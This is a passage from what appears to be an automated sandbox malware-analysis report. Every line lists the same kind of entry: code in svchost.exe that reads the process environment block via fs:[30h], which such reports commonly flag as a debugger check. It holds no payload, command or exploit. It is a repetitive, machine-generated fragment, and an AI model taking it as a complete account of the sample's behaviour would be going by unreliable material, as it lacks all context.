          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E131B mov eax, dword ptr fs:[00000030h]17_2_030E131B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302DB40 mov eax, dword ptr fs:[00000030h]17_2_0302DB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8B58 mov eax, dword ptr fs:[00000030h]17_2_030F8B58
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302F358 mov eax, dword ptr fs:[00000030h]17_2_0302F358
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302DB60 mov ecx, dword ptr fs:[00000030h]17_2_0302DB60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03053B7A mov eax, dword ptr fs:[00000030h]17_2_03053B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03053B7A mov eax, dword ptr fs:[00000030h]17_2_03053B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E138A mov eax, dword ptr fs:[00000030h]17_2_030E138A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03031B8F mov eax, dword ptr fs:[00000030h]17_2_03031B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03031B8F mov eax, dword ptr fs:[00000030h]17_2_03031B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DD380 mov ecx, dword ptr fs:[00000030h]17_2_030DD380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052397 mov eax, dword ptr fs:[00000030h]17_2_03052397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305B390 mov eax, dword ptr fs:[00000030h]17_2_0305B390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054BAD mov eax, dword ptr fs:[00000030h]17_2_03054BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054BAD mov eax, dword ptr fs:[00000030h]17_2_03054BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054BAD mov eax, dword ptr fs:[00000030h]17_2_03054BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F5BA5 mov eax, dword ptr fs:[00000030h]17_2_030F5BA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A53CA mov eax, dword ptr fs:[00000030h]17_2_030A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A53CA mov eax, dword ptr fs:[00000030h]17_2_030A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]17_2_030503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]17_2_030503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]17_2_030503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]17_2_030503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]17_2_030503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]17_2_030503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304DBE9 mov eax, dword ptr fs:[00000030h]17_2_0304DBE9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03038A0A mov eax, dword ptr fs:[00000030h]17_2_03038A0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03025210 mov eax, dword ptr fs:[00000030h]17_2_03025210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03025210 mov ecx, dword ptr fs:[00000030h]17_2_03025210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03025210 mov eax, dword ptr fs:[00000030h]17_2_03025210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03025210 mov eax, dword ptr fs:[00000030h]17_2_03025210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302AA16 mov eax, dword ptr fs:[00000030h]17_2_0302AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302AA16 mov eax, dword ptr fs:[00000030h]17_2_0302AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03043A1C mov eax, dword ptr fs:[00000030h]17_2_03043A1C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EAA16 mov eax, dword ptr fs:[00000030h]17_2_030EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EAA16 mov eax, dword ptr fs:[00000030h]17_2_030EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03064A2C mov eax, dword ptr fs:[00000030h]17_2_03064A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03064A2C mov eax, dword ptr fs:[00000030h]17_2_03064A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]17_2_0304A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]17_2_0304A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]17_2_0304A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]17_2_0304A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]17_2_0304A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]17_2_0304A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]17_2_0304A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]17_2_0304A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]17_2_0304A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029240 mov eax, dword ptr fs:[00000030h]17_2_03029240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029240 mov eax, dword ptr fs:[00000030h]17_2_03029240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029240 mov eax, dword ptr fs:[00000030h]17_2_03029240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029240 mov eax, dword ptr fs:[00000030h]17_2_03029240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EEA55 mov eax, dword ptr fs:[00000030h]17_2_030EEA55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030B4257 mov eax, dword ptr fs:[00000030h]17_2_030B4257
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DB260 mov eax, dword ptr fs:[00000030h]17_2_030DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DB260 mov eax, dword ptr fs:[00000030h]17_2_030DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8A62 mov eax, dword ptr fs:[00000030h]17_2_030F8A62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306927A mov eax, dword ptr fs:[00000030h]17_2_0306927A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305D294 mov eax, dword ptr fs:[00000030h]17_2_0305D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305D294 mov eax, dword ptr fs:[00000030h]17_2_0305D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]17_2_030252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]17_2_030252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]17_2_030252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]17_2_030252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]17_2_030252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303AAB0 mov eax, dword ptr fs:[00000030h]17_2_0303AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303AAB0 mov eax, dword ptr fs:[00000030h]17_2_0303AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305FAB0 mov eax, dword ptr fs:[00000030h]17_2_0305FAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052ACB mov eax, dword ptr fs:[00000030h]17_2_03052ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052AE4 mov eax, dword ptr fs:[00000030h]17_2_03052AE4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029100 mov eax, dword ptr fs:[00000030h]17_2_03029100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029100 mov eax, dword ptr fs:[00000030h]17_2_03029100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029100 mov eax, dword ptr fs:[00000030h]17_2_03029100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120 mov ecx, dword ptr fs:[00000030h]17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305513A mov eax, dword ptr fs:[00000030h]17_2_0305513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305513A mov eax, dword ptr fs:[00000030h]17_2_0305513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B944 mov eax, dword ptr fs:[00000030h]17_2_0304B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B944 mov eax, dword ptr fs:[00000030h]17_2_0304B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C962 mov eax, dword ptr fs:[00000030h]17_2_0302C962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302B171 mov eax, dword ptr fs:[00000030h]17_2_0302B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302B171 mov eax, dword ptr fs:[00000030h]17_2_0302B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A185 mov eax, dword ptr fs:[00000030h]17_2_0305A185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304C182 mov eax, dword ptr fs:[00000030h]17_2_0304C182
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052990 mov eax, dword ptr fs:[00000030h]17_2_03052990
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030561A0 mov eax, dword ptr fs:[00000030h]17_2_030561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030561A0 mov eax, dword ptr fs:[00000030h]17_2_030561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]17_2_030E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]17_2_030E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]17_2_030E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]17_2_030E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A69A6 mov eax, dword ptr fs:[00000030h]17_2_030A69A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]17_2_030A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]17_2_030A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]17_2_030A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]17_2_030A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030B41E8 mov eax, dword ptr fs:[00000030h]17_2_030B41E8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302B1E1 mov eax, dword ptr fs:[00000030h]17_2_0302B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302B1E1 mov eax, dword ptr fs:[00000030h]17_2_0302B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302B1E1 mov eax, dword ptr fs:[00000030h]17_2_0302B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F4015 mov eax, dword ptr fs:[00000030h]17_2_030F4015
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F4015 mov eax, dword ptr fs:[00000030h]17_2_030F4015
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7016 mov eax, dword ptr fs:[00000030h]17_2_030A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7016 mov eax, dword ptr fs:[00000030h]17_2_030A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7016 mov eax, dword ptr fs:[00000030h]17_2_030A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]17_2_0305002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]17_2_0305002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]17_2_0305002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]17_2_0305002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]17_2_0305002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]17_2_0303B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]17_2_0303B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]17_2_0303B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]17_2_0303B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]17_2_0304A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]17_2_0304A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]17_2_0304A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]17_2_0304A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03040050 mov eax, dword ptr fs:[00000030h]17_2_03040050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03040050 mov eax, dword ptr fs:[00000030h]17_2_03040050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F1074 mov eax, dword ptr fs:[00000030h]17_2_030F1074
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E2073 mov eax, dword ptr fs:[00000030h]17_2_030E2073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029080 mov eax, dword ptr fs:[00000030h]17_2_03029080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A3884 mov eax, dword ptr fs:[00000030h]17_2_030A3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A3884 mov eax, dword ptr fs:[00000030h]17_2_030A3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030690AF mov eax, dword ptr fs:[00000030h]17_2_030690AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305F0BF mov ecx, dword ptr fs:[00000030h]17_2_0305F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305F0BF mov eax, dword ptr fs:[00000030h]17_2_0305F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305F0BF mov eax, dword ptr fs:[00000030h]17_2_0305F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov ecx, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B8E4 mov eax, dword ptr fs:[00000030h]17_2_0304B8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B8E4 mov eax, dword ptr fs:[00000030h]17_2_0304B8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030240E1 mov eax, dword ptr fs:[00000030h]17_2_030240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030240E1 mov eax, dword ptr fs:[00000030h]17_2_030240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030240E1 mov eax, dword ptr fs:[00000030h]17_2_030240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030258EC mov eax, dword ptr fs:[00000030h]17_2_030258EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F070D mov eax, dword ptr fs:[00000030h]17_2_030F070D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F070D mov eax, dword ptr fs:[00000030h]17_2_030F070D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A70E mov eax, dword ptr fs:[00000030h]17_2_0305A70E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A70E mov eax, dword ptr fs:[00000030h]17_2_0305A70E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304F716 mov eax, dword ptr fs:[00000030h]17_2_0304F716
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BFF10 mov eax, dword ptr fs:[00000030h]17_2_030BFF10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BFF10 mov eax, dword ptr fs:[00000030h]17_2_030BFF10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03024F2E mov eax, dword ptr fs:[00000030h]17_2_03024F2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03024F2E mov eax, dword ptr fs:[00000030h]17_2_03024F2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305E730 mov eax, dword ptr fs:[00000030h]17_2_0305E730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B73D mov eax, dword ptr fs:[00000030h]17_2_0304B73D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B73D mov eax, dword ptr fs:[00000030h]17_2_0304B73D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303EF40 mov eax, dword ptr fs:[00000030h]17_2_0303EF40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303FF60 mov eax, dword ptr fs:[00000030h]17_2_0303FF60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8F6A mov eax, dword ptr fs:[00000030h]17_2_030F8F6A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03038794 mov eax, dword ptr fs:[00000030h]17_2_03038794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7794 mov eax, dword ptr fs:[00000030h]17_2_030A7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7794 mov eax, dword ptr fs:[00000030h]17_2_030A7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7794 mov eax, dword ptr fs:[00000030h]17_2_030A7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030637F5 mov eax, dword ptr fs:[00000030h]17_2_030637F5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C600 mov eax, dword ptr fs:[00000030h]17_2_0302C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C600 mov eax, dword ptr fs:[00000030h]17_2_0302C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C600 mov eax, dword ptr fs:[00000030h]17_2_0302C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03058E00 mov eax, dword ptr fs:[00000030h]17_2_03058E00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1608 mov eax, dword ptr fs:[00000030h]17_2_030E1608
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A61C mov eax, dword ptr fs:[00000030h]17_2_0305A61C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A61C mov eax, dword ptr fs:[00000030h]17_2_0305A61C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302E620 mov eax, dword ptr fs:[00000030h]17_2_0302E620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DFE3F mov eax, dword ptr fs:[00000030h]17_2_030DFE3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EAE44 mov eax, dword ptr fs:[00000030h]17_2_030EAE44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EAE44 mov eax, dword ptr fs:[00000030h]17_2_030EAE44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303766D mov eax, dword ptr fs:[00000030h]17_2_0303766D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]17_2_0304AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]17_2_0304AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]17_2_0304AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]17_2_0304AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]17_2_0304AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BFE87 mov eax, dword ptr fs:[00000030h]17_2_030BFE87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F0EA5 mov eax, dword ptr fs:[00000030h]17_2_030F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F0EA5 mov eax, dword ptr fs:[00000030h]17_2_030F0EA5
